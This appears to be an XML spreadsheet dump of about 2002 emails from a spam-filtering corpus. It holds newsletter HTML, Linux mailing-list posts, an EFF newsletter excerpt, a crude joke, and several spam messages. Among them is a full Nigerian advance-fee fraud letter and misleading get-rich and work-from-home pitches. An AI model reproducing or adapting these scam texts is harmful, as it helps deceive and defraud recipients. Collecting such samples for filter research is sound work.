       text-decoration:underline;
     }
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;DIV align="center"&gt;To unsubscribe, use the link at foot of this page.&lt;BR&gt;&lt;a href="http://www.berkshireeagle.com"&gt;&lt;img src="http://63.147.65.2/images/eagle1.gif" width="299" height="34" border="0" alt="Berkshire Eagle Home Page"&gt;&lt;/a&gt;&lt;/DIV&gt;
 &lt;DIV align="center"&gt;&lt;table border="0" width="98%"
 cellpadding="5" cellspacing="5"&gt;&lt;tr valign=top&gt;&lt;td
 align="center"&gt;&lt;a href="http://www.landmark-cu.com"&gt;&lt;img
 src="http://63.147.65.2/images/landmarkcu.jpg"
 border="0" width=456 height=48  alt="Landmark Credit
 Union"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/DIV&gt;
 &lt;table align=center width=460&gt;&lt;tr&gt;&lt;td&gt;
 			&lt;table align="right" valign="top" width="120"&gt;
 			&lt;tr&gt;
 				&lt;td&gt;
 					&lt;!-- BEGIN BREAKING-NEWS BOX --&gt;&lt;a class='breakNewsBox'&gt;&lt;table cellspacing='2' cellpadding='2'&gt;&lt;tr&gt;&lt;td class='breakNewsHead'&gt;Breaking News&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;a class='breakNewsSection' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E,00.html'&gt;Local Headlines&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E833793,00.html'&gt;Car with young driver said to swerve near police cruiser&lt;/a&gt;&lt;br&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E833795,00.html'&gt;Foundation wins grant to plan rink&lt;/a&gt;&lt;br&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E833794,00.html'&gt;Illustrator writes a book on bridge&lt;/a&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;a class='breakNewsSection' href='http://www.berkshire
  e!
 agle.com/Stories/0,1413,101%257E6295%257E,00.html'&gt;Sports Headlines&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6295%257E833823,00.html'&gt;A's used Tejada's dramatics to claim 18th straight win&lt;/a&gt;&lt;br&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6295%257E833820,00.html'&gt;Baseball throws brushback pitch at fan Web sites&lt;/a&gt;&lt;br&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6295%257E833816,00.html'&gt;Bears triumph in Quebec&lt;/a&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;a class='breakNewsSection' href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6267%257E,00.html'&gt;Today&amp;#39;s Editorials&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span class='breakNewsDot'&gt;&amp;#149;&amp;nbsp;&lt;/span&gt;&lt;a class='breakNewsLink' href='http://www.berkshireeagle.com/Stories/0,14
  1!
 3,101%257E6267%257E833827,00.html'&gt;Waiting for PEER to make its case&lt;/a&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/a&gt;&lt;!-- END BREAKING-NEWS BOX --&gt;
 				&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;p&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E7514%257E,00.html' class='homeSectionTitle'&gt;Today&amp;#39;s Headlines&lt;/a&gt;&lt;br&gt;
 &lt;SCRIPT&gt;
 	&lt;!-- // Hide from older browsers
 	function openEnlarged(url, width, height) 
 	{
 		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	function showVideo(url, width, height) {
 		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	// --&gt;
 &lt;/SCRIPT&gt;
 &lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E7514%257E833788,00.html' class='homeArticleTitle'&gt;Lieutenant governor's race competitive, unique&lt;/a&gt;&lt;br&gt;&lt;span class='homeArticleBlurb'&gt;BOSTON -- Mitt Romney flinched when asked about the possibility of being forced to campaign with James Rappaport instead of his hand-picked running mate, Kerry Healey.... &lt;/span&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E7514%257E833788,00.html'  class='homeArticleLinkText'&gt;More&lt;/a&gt;&lt;br clear='left'/&gt;&lt;br&gt;&lt;p&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E,00.html' class='homeSectionTitle'&gt;LOCAL NEWS&lt;/a&gt;&lt;br&gt;
 &lt;SCRIPT&gt;
 	&lt;!-- // Hide from older browsers
 	function openEnlarged(url, width, height) 
 	{
 		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	function showVideo(url, width, height) {
 		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	// --&gt;
 &lt;/SCRIPT&gt;
 &lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E833791,00.html' class='homeArticleTitle'&gt;'Dream' jobs vs. real jobs Couples juggle life and labor&lt;/a&gt;&lt;br&gt;&lt;span class='homeArticleBlurb'&gt;Labor Day delivers a break from tedious work tasks for much of the country's work force, but young Griffin Gageant recently seemed eager to launch a plan for his life's labor.... &lt;/span&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6282%257E833791,00.html'  class='homeArticleLinkText'&gt;More&lt;/a&gt;&lt;br clear='left'/&gt;&lt;br&gt;&lt;p&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6295%257E,00.html' class='homeSectionTitle'&gt;SPORTS&lt;/a&gt;&lt;br&gt;
 &lt;SCRIPT&gt;
 	&lt;!-- // Hide from older browsers
 	function openEnlarged(url, width, height) 
 	{
 		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	function showVideo(url, width, height) {
 		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	// --&gt;
 &lt;/SCRIPT&gt;
 &lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6295%257E833789,00.html' class='homeArticleTitle'&gt;Wood or aluminum: MIAA to decide&lt;/a&gt;&lt;br&gt;&lt;span class='homeArticleBlurb'&gt;The Massachusetts Interscholastic Athletic Association, the governing body of scholastic sports in the state, will be meeting later this month to discuss the possibility of using wooden bats for the 2003 scholastic baseball postseas... &lt;/span&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6295%257E833789,00.html'  class='homeArticleLinkText'&gt;More&lt;/a&gt;&lt;br clear='left'/&gt;&lt;br&gt;&lt;p&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6267%257E,00.html' class='homeSectionTitle'&gt;COMMENTARY&lt;/a&gt;&lt;br&gt;
 &lt;SCRIPT&gt;
 	&lt;!-- // Hide from older browsers
 	function openEnlarged(url, width, height) 
 	{
 		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	function showVideo(url, width, height) {
 		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
 		wid.focus();
 	}
 	// --&gt;
 &lt;/SCRIPT&gt;
 &lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6267%257E833790,00.html' class='homeArticleTitle'&gt;Emily Post evolves&lt;/a&gt;&lt;br&gt;&lt;span class='homeArticleBlurb'&gt;The New York Times announcement last month that the paper will add same-sex unions to its wedding announcements provides a nice boost to the cause of gay rights. The Times, however, is only acknowledging a healthy social phenomenon that's been building fo... &lt;/span&gt;&lt;a href='http://www.berkshireeagle.com/Stories/0,1413,101%257E6267%257E833790,00.html'  class='homeArticleLinkText'&gt;More&lt;/a&gt;&lt;br clear='left'/&gt;&lt;br&gt;
 			&lt;p&gt;
 			&lt;table cellspacing="1" cellpadding="4" border="0" align="center"&gt;
 &lt;tr&gt;
 &lt;td colspan="4" height="30"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 		&lt;tr&gt;
 		    &lt;td colspan="2" class="pageBottomTitle"&gt;Special Sections&lt;/td&gt;
 		    &lt;td colspan="2" class="pageBottomTitle"&gt;Entertainment&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		    &lt;td valign="top"&gt;
 		    		&lt;a href="http://63.147.65.2/antiques" class="pageBottomLinks"&gt;Antiques Guide&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/showcase" class="pageBottomLinks"&gt;Auto Showcase&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/chamber" class="pageBottomLinks"&gt;Berkshire&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/chamber" class="pageBottomLinks"&gt;Business&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshiresweek.com/" class="pageBottomLinks"&gt;Berkshires Week&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://63.147.65.2/berkshires2030" class="pageBottomLinks"&gt;Berkshires 2030&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshirecommunity.com" class="pageBottomLinks"&gt;Community&lt;/a&gt;&lt;BR&gt;
 		    &lt;/td&gt;
 		    &lt;td valign="top"&gt;
 		    		&lt;a href="http://63.147.65.2/dotcom/bottom.htm" class="pageBottomLinks"&gt;Dot Com Directory&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/golden" class="pageBottomLinks"&gt;Golden Years&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.healthquarterly.com" class="pageBottomLinks"&gt;Health Quarterly&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/homeimprovement/spring" class="pageBottomLinks"&gt;Home Improvement&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/summerpreview" class="pageBottomLinks"&gt;Summer Preview&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/outdoor" class="pageBottomLinks"&gt;Outdoor Living&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/weddingplanner" class="pageBottomLinks"&gt;Wedding Planner&lt;/a&gt;&lt;BR&gt;
 		    &lt;/td&gt;
 		    &lt;td valign="top"&gt;
 		    		&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%7E6335%7E,00.html" class="pageBottomLinks"&gt;Arts/Entertainment&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%7E6337%7E,00.html" class="pageBottomLinks"&gt;Books&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%257E6345%257E,00.html" class="pageBottomLinks"&gt;Movie Schedules&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%7E6346%7E,00.html" class="pageBottomLinks"&gt;Movie Reviews&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/theater.htm" class="pageBottomLinks"&gt;Theater Reviews&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%7E6273%7E,00.html" class="pageBottomLinks"&gt;Columnists&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%257E23929%257E776687,00.html" class="pageBottomLinks"&gt;Lotteries&lt;/a&gt;&lt;BR&gt;
 		    &lt;/td&gt;
 		    &lt;td valign="top"&gt;
 		    		&lt;a href="http://www.headbonezone.com" class="pageBottomLinks"&gt;Headbone Zone&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshirecommunity.com/sports/" class="pageBottomLinks"&gt;SportZone&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.datemaker.com/pittsfield" class="pageBottomLinks"&gt;Personals&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%7E6309%7E,00.html" class="pageBottomLinks"&gt;What's Doing?&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://www.berkshireeagle.comhttp://www.berkshireeagle.com/Stories/0,1413,101%7E6308%7E,00.html" class="pageBottomLinks"&gt;Week's Calendar&lt;/a&gt;&lt;br&gt;
 				&lt;a href="http://63.147.65.2/forms/phoorder.asp" class="pageBottomLinks"&gt;Photo Reprints&lt;/a&gt;&lt;BR&gt;
 		    &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td align="center" colspan="4"&gt;
 				&lt;table cellpadding="5" cellspacing="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;a href="http://www.thetranscript.com" style="border: 0px"&gt;&lt;img src="http://media.mnginteractive.com/media/paper101/transcript.gif" border="0" alt="North Adams Transcript"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;td align="center"&gt;&lt;a href="http://www.reformer.com" style="border: 0px"&gt;&lt;img src="http://media.mnginteractive.com/media/paper101/reformer.gif" border="0" alt="Brattleboro Reformer"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;td align="right"&gt;&lt;a href="http://www.benningtonbanner.com" style="border: 0px"&gt;&lt;img src="http://media.mnginteractive.com/media/paper101/bbanner.gif" border="0" alt="Bennington Banner"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 			&lt;/p&gt;
 &lt;/tr&gt;&lt;/td&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;br&gt;&lt;div align=center&gt;&lt;a href="http://63.147.65.2/newsletter"&gt;&lt;font face=arial size=1&gt;click to unsubscribe from newsletter or change format&lt;/font&gt;&lt;/a&gt;&lt;/div&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 96l2
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
                  Do You Want To Teach and Grow Rich?
 If you are a motivated and qualified communicator, I will personally train you to do 3  20 minutes presentations per day to qualify prospects that I can provide to you.  We will demonstrate to you that you can make $400 a day part time using this system.  Or, if you have 20 hours per week, as in my case, you can make in excess of $10,000 per week, as I am currently generating (verifiable, by the way).  
 Plus I will introduce you to my mentor who makes well in excess of $1,000,000 annually.
 Many are called, few are chosen.  This opportunity will be limited to one qualified individual per state.  Make the call and call the 24 hour pre-recorded message number below.  We will take as much or as little time as you need to see if this program is right for you.  
                           *** 801-296-4140 *** 
 Please do not make this call unless you are genuinely money motivated and qualified.  I need people who already have people skills in place and have either made large amounts of money in the past or are ready to generate large amounts of money in the future.  Looking forward to your call.    
                              *** 801-296-4140 *** 
 _______________________________________________________________ 
 *To be taken out of this database: 
   benno5@witty.com  
 7783rMXA7-171LWkK6405nYqr3-290bTQi2365AwLL8-360bRcX5658nxuv3-0l58
 4375WCTg4-101pbkG3860ZiOn2-152xcTA8770NGxl9-322sHBy6554mHhn1-223Hl61
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 10:19:50PM -0700, Rick Moen wrote:
 &gt; Some people strip down old 486 boxes, take out the hard drive, disable
 &gt; the fans, and run the thing from just a floppy drive or a CDR you've
 &gt; burned for the purpose.  
 what about using a pcmcia card and a compaq flash card?  or doing an
 nfs boot to a server in a noiser part of the house?  (the boiler room
 or something like that)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Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, ""Angles" wrote :
 &gt; Any sage advice on the most painless way to upgrade from old limbo (.92)
 &gt; to new limbo (.93)?
 &gt; 
 &gt; Apt for rpm from the 7.3 days barely works on Limbo1, and the package:
 &gt; apt-0.5.4cnc6-dwd2.src.rpm will not compile on the Libbo1 box (I was
 &gt; going to use that to dist-upgrade to Limbo2).
 Well, the 7.3 binary should work as long as you install the "rpm404" (IIRC)
 compatibility library. The only problem I have with some rpm 4.1 versions
 is that it sometimes hangs at the and of operations (-e, -i, -F or -U) and
 the only workaround is to kill it, "rm -f /var/lib/rpm/__*" and try again.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</si>
  <si>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Powerball Results Saturday September 14, 2002 Estimated Jackpot $100 Million
</t>
  </si>
  <si>
    <t xml:space="preserve">Would you like to know what the Powerball Winning Lottery Numbers will be in the Morning, If so Just Follow This link mailto:results.cresenttechnologies.com
 Although every attempt is made to ensure that this list of numbers is accurate, the official winning numbers are recorded in the official draw files as certified by the independent accounting firm. At the request of our players, these numbers are listed in numerical order. 
 Wednesday September 11, 2002 Draw Results:
 03 06 26 39 48 PB 28 PP 03 Or Visit http://www.powerballinfo.cjb.net
 Are you tired of your job?
 Then Please Visit http://www.cash-in.cjb.net  It's Time to Retire!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: JOTD: Sean Connery three times a night.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: "Simondo" &lt;simondo@paradise.net.nz&gt;
 Sean Connery was interviewed by Michael Parkinson, and bragged that
 despite his 72 years of age, he could still have sex three times a
 night.
 Lulu, who was also a guest, looked intrigued.
 After the show, Lulu said, "Sean, if Ah'm no bein too forward, Ah'd love
 tae hae sex wi an aulder man. Let's go back tae mah place."
 So they go back to her place and have great sex. Afterwards, Sean  says,
 "If you think that was good, let me shleep for half an hour, and we can
 have even better shex. But while I'm shleeping, hold my baws in your
 left hand and my wullie in your right hand."
 Lulu looks a bit perplexed, but says, "Okay."
 He sleeps for half and hour, awakens, and they have even better sex.
 Then Sean says, "Lulu,  that was wonderful. But if you let me shleep
 for an hour, we can have  the besht shex yet. But again, hold my baws
 in your left hand, and my wullie in your right hand."
 Lulu is now used to the routine and  complies.
 The results are mind blowing. Once it's all over, and the cigarettes
 are lit, Lulu asks "Sean, tell me, dis mah haudin yer baws in mah left
 hand and yer wullie in mah right stimulate ye while ye're sleepin?"
 Sean replies, "No, but the lasht time I shlept with a Glashwegian, she
 shtole my wallet."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: USA USA WE ARE NUMBER ....six.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://news.bbc.co.uk/2/hi/americas/2147882.stm#table
 "Around the world, there is a growing sense that democracy has not
 delivered development" Sakiko Fukuda-Parr UN report author
 HDI rank 2002    LifeEXp InfantMort/1000  GDP$percapita  AdultLit%
 1 Norway           78.5      4               29,918       99%*
 2 Sweden           79.7      3               24,277       99%*
 3 Canada           78.8      6               27,840       99%*
 4 Belgium          78.4      6               27,178       99%*
 5 Australia        78.9      6               25,693       99%*
 6 United States    77        7               34,142       99%*
 7 Iceland          79.2      4               29,581       99%*
 8 Netherlands      78.1      5               25,657       99%*
 9 Japan            81        4               26,755       99%*
 10 Finland         77.6      4               24,996       99%*
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-31 at 12:38, kevin lyda wrote:
 &gt; and see, that would be my retort to any overly zealous irish speaker.
 &gt; there's a huge opportunity for a fully irish computing environment in
 &gt; free software.  and yet i don't see much action from official irish
 &gt; organisations.  the reason mandrake and some others have the irish
 &gt; support they have is because of individuals like donnacha.
 Just a note to say that the Basque government has payed for having
 Mandrake translated to Basque (and release all the changes), so that you
 can just install it and the desktop and apps can be in your language. I
 think that whichever organization (Irish government I suppose) is in
 charge of promoting Irish here could learn a lot from them. 
 The Basque government used to pay MS for translating Windows, but they
 got pissed off because it was extremely expensive and the translations
 would come out when the software was already obsolete. Now they promote
 Free Software while helping the language at the same time, I think it's
 a win-win situation ;).
 cheers,
 Arkaitz
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Custom sites or site redesigns $399
</t>
  </si>
  <si>
    <t xml:space="preserve">
 For a limited time, you can get a beautuful, 100% custom website (or yours redesigned) for $399 complete when you host with us for only @19.95/month. (100 megs, 20  Email POP accounts and more). Includes up to 6 pages (you can add more), feedback forms, more.
 We have plenty of references cost to coast.  Call 800-215-4490 (24 hours) for details and site addresses to see our beautiful custom work.
 To be removed from our list, Click here:  xxz7rem@mail.com?subject=Remove81TH
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] IMPORTANT.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;From the desk of: DR. SAMUEL EBOKA.
 Tel No: Your Intl. Access Code + 873762692484
 Fax No: Your Intl. Access Code + 873762692485
 email : samueleboka2@email.com
 Lagos, Nigeria.
 Dear Sir,
 IMPORTANT.
 After due deliberation with my colleagues, We have decided to forward to
 you this business proposal. We want a reliable 
 person who could assist us in the transfer the sum of Twenty Million, Five
 Hundred Thousand United States Dollars ( 
 $20,500,000 ). Via International Bank Draft Cashable in any First World
 Countries.
 This fund resulted from an over-invoiced bill from contracts awarded by us
 under the budget allocation to our Ministry. This 
 bill has been approved for payment by the other concerned Ministries. The
 contract has since been executed, 
 commissioned and the contractor was paid the actual cost of the contract.
 We are left with the balance US$20.5M as part 
 of the over-invoiced amount which we have deliberated over estimated for
 our own use. But under our protocol division, we 
 as civil servants are forbidden to operate or own foreign accounts. This
 is why we are soliciting your assistance in this 
 manner and regard .
 As you may want to know and to make you less curious, I got your address
 from adverts in the business directory . I am the 
 Chief Accountant/Internal Auditor of the Contract Award Committee ( CAC )
 of the Nigerian National Petroleum Corporation 
 ( NNPC). This transaction is very much free from all sorts of RISKS and
 TROUBLE from my Government. We the N.N.P.C. 
 Officials involved in this deal have put in many years in service to this
 Ministry. We have been exercising patience for this 
 opportunity for so long and to most of us this is a life time opportunity
 we cannot afford to miss.
 We have agreed to COMPENSATE you duly if agreement is reached by both of
 us and I and one of my colleagues 
 involved in this deal will come to your country to arrange for our share,
 upon the confirmation from you that the Certified 
 International Bank Draft has been Approved and Raised in your favor.
 Consequent upon your acceptance of this proposal, kindly confirm your
 interest by Telephone to me, through my Direct Tel 
 No: +873-762-692484. (Please Call Direct, DO NOT add my country(234) and
 City(1) codes ) . Your indication by revert 
 Telephone to me of your sincere and serious interest will enable me fax
 you or brief you of  the PROCEDURES FOR THIS 
 TRANSACTION. If my line is busy, please keep trying you will surely get
 through.
 NOTE: In the event of your inability to handle this transaction please
 inform us so that we can look for another reliable 
 person who can assist in this respect. 
 It might surprise you why we choose you and trusted you for this
 transaction. Yes, we believe that good friends can be 
 discovered and business like this can not be realized without mutual
 trust. This is why we have decided to trust you for this 
 transaction. Be further informed that everyones interest and
 security had been considered before you were contacted, so be rest assured
 and feel free to go into this transaction with 
 us.
 But let Honesty and Trust be our watchword throughout this transaction and
 your prompt reply will be highly appreciated. 
 Thank you, and God bless.
 Best Regards,
 DR. SAMUEL  EBOKA.
 NOTE:- THAT YOU CAN USE THIS ALTERNATIVE EMAIL ADDRESSES:
 samueleboka2@email.com , sameboka@uymail.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IIU] IIU: Recommendations on phone / pda+phone + European GPRS coverage
</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,
 thanks for the good information on the choice of phones, pda choices.
 as an aside i also saw that 3com have released a usb blootooth dongle. 
 that in a lptp combined with a 6310i with the blootooth (with HSCSD) 
 might be a nice thing to have (if they work!)
 i'm doin up a little doc, so if anyone is interested i'll post my findings.
 cheers!
 mit bestem,
 Bernardino
 -- 
 rgrds,
 Bernard
 -- 
 Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
 E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri Sep 13 2002 at 02:03, Robert Elz wrote:
 &gt;     Date:        Wed, 11 Sep 2002 20:15:00 -0700
 &gt;     From:        Brent Welch &lt;welch@panasas.com&gt;
 &gt;   | exmh has a funky cut/paste model that is essentially all my fault.
 &gt;   | The middle click sets the insert point.  If you hate that, go to the
 &gt;   | Bindings... Simple Edit preferences window and de-select
 &gt;   | "Paste Sets Insert".
 &gt; 
 &gt; Unfortunately, the side effect of that solution is that it is no longer
 &gt; possible to cut/paste within one sedit window, some intermediate client
 &gt; always must be used (except in the rare case where you want to select
 &gt; some text, and then paste it at the same place).
 &gt; So, the vast majority of people probably want that "Paste Sets Insert"
 &gt; enabled - that one you can learn to live with, the other is much more
 &gt; painful.
 For a long time I have used an external editor with exmh (gvim).
 I can cut'n'paste from exmh's message display window into spawned
 gvim processes, but not into anything else.
 This is VERY annoying.
   (I have to look at the message with cat or less or whatever in a
   terminal window if I want to do this - which is quite often.  And
   if the message is q-p encoded or a non-text/plain mime type, I end
   up with all that raw garbage too).
 Anyway to fix this?
 (BTW: standard i386 redhat7.3)
 Thanks.
 &gt; kre
 Cheers
 Tony
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EFFector 15.28: Motions Filed in Morpheus Peer-to-Peer Case,
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector Online Newsletter
 EFFector      Vol. 15, No. 28      September 11, 2002      ren@eff.org
 A Publication of the Electronic Frontier Foundation     ISSN 1062-9424
 In the 227th Issue of EFFector:
     * Motions Filed in Morpheus Peer-to-Peer Case
     * EFF's Second Annual Share-In This Weekend!
     * Help With Our Internet Blocking in Schools Project
     * Deep Links
     * Administrivia
 For more information on EFF activities &amp; alerts: http://www.eff.org/
 To join EFF or make an additional donation:
   http://www.eff.org/support/
 EFF is a member-supported nonprofit. Please sign up as a member today!
 *Motions Filed in Morpheus Peer-to-Peer Case
 Judge to Consider Legality of Gnutella Software
 Los Angeles - Attorneys for StreamCast Networks, developers of the
 popular Morpheus peer-to-peer (P2P) file sharing software, filed
 briefs in federal court on Monday seeking a ruling that distribution
 of the software does not violate copyright law.
 Morpheus is a popular file-sharing application based on the
 decentralized Gnutella P2P networking protocol.
 In their briefs seeking summary judgment, attorneys from the
 Electronic Frontier Foundation (EFF) and the law firm of Brobeck,
 Phleger and Harrison argued that distribution of the software is legal
 because the product is capable of substantial noninfringing uses and
 because StreamCast cannot control the various uses of the software.
 Supporting StreamCast in the motion is nine time Grammy nominee Janis
 Ian, who believes that peer-to-peer software represents important new
 opportunities for artists.
 On October 2, 2001, 28 of the world's largest entertainment companies
 sued StreamCast for the allegedly infringing actions of users of its
 product (MGM et al v. Grokster et al, Case No. 01-CV-8541 SVW).
 Additional briefs will be filed in the months to come, with oral
 arguments set for December 2, 2002, before U.S. Federal District Court
 Judge Stephen Wilson in Los Angeles.
